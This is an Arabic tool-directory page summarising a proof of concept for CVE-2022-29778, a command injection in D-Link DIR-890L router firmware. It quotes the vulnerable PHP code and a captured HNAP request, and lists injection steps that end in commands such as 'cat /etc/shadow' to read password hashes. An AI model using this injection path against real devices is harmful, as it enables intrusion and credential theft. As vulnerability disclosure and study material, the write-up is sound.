Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DIR-890L-1.20-RCE — تحليل وPoC لـ D-Link DIR-890L RCE (CVE-2022-29778) | Kitploit
أدوات/GitHubGitHub/tyeyeah/dir-890l-1.20-rce
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubtyeyeah/dir-890l-1.20-rce

DIR-890L-1.20-RCE

تحليل وPoC لـ D-Link DIR-890L RCE (CVE-2022-29778)

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

D-Link DIR-890L RCE

الإصدار المتأثر: <= v1.22B01 Hotfix (الأحدث)

البرنامج الثابت: هنا

هذا الطراز بلغ نهاية دورة حياته. لقد توقف تطوير الموارد المرتبطة بهذه المنتجات وأصبحت غير مدعومة. توصي شركة D-Link Systems, Inc. بإيقاف استخدام هذه المنتجات واستبدالها بمنتجات تتلقى تحديثات للبرنامج الثابت.

الثغرة

في البرنامج الثابت الخاص به، يمكننا العثور على دالة getWOLMAC في SetVirtualServerSettings.php

root@kitploit:~
function getWOLMAC($ipv4addr)
{
	$cmd = "scut -p ".$ipv4addr." -f 3 /proc/net/arp";
	setattr("/runtime/wakeonlan/mac", "get", $cmd);
	$mac = get("", "/runtime/wakeonlan/mac");
	del("/runtime/wakeonlan/mac");
	return $mac;
}

تقوم $cmd بدمج $ipv4addr مباشرة في الأمر دون أي تصفية، ويتم استدعاؤها في:

root@kitploit:~
		$ipv4addr = get("x", "LocalIPAddress");
        ...
		if($description == "Wake-On-Lan")
		{
			$wolmac = getWOLMAC($ipv4addr);
			set($vsvr_entry.":".$InDeX."/wakeonlan_mac", $wolmac);
		}

لذا، عندما تقوم بتعيين $description (المقابلة لاسم الخادم الافتراضي) إلى "Wake-On-Lan"، فقد توجد ثغرة RCE (تنفيذ أوامر عن بُعد) في الصفحات المتعلقة بالخادم الافتراضي: /VirtualServer.html.

الاستغلال

  • يتطلب الأمر مصادقة، لذا سجّل الدخول أولاً. Login Home

  • ثم قم بزيارة صفحة الخادم الافتراضي (/VirtualServer.html) التي لا يمكن الوصول إليها من خلال لوحة التحكم. Virtual Server

  • أضف قاعدة باسم Wake-On-Lan. Add rule Rule results

  • شغّل burpsuite قبل النقر على زر Save والتقط الحزمة التالية: packet

root@kitploit:~
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetVirtualServerSettings"
HNAP_AUTH: A4A816AE6CF2AC5537B0EB390FFB591C 1436839665
Content-Length: 765
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/VirtualServer.html
Cookie: uid=ZeNYZag3Gw

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetVirtualServerSettings>
			<VirtualServerList>
				<VirtualServerInfo>
					<Enabled>true</Enabled>
					<VirtualServerDescription>Wake-On-Lan</VirtualServerDescription>
					<ExternalPort>1</ExternalPort>
					<InternalPort>1</InternalPort>
					<ProtocolType>TCP</ProtocolType>
					<ProtocolNumber>6</ProtocolNumber>
					<LocalIPAddress>192.168.0.100</LocalIPAddress>
					<ScheduleName></ScheduleName>
				</VirtualServerInfo>
			</VirtualServerList>
		</SetVirtualServerSettings>
	</soap:Body>
</soap:Envelope>
  • جهّز خادم HTTP ثم: python server

  • استخدم وحدة Repeater لاختبار ثغرة RCE (تنفيذ أوامر عن بُعد): burpsuite

  • ونحصل على: result

  • اختبر حقن الأوامر واقرأ /etc/shadow: command ls /busy/box result command ls /busybox -al result command cat /etc/shadow result

تنزيل الأداة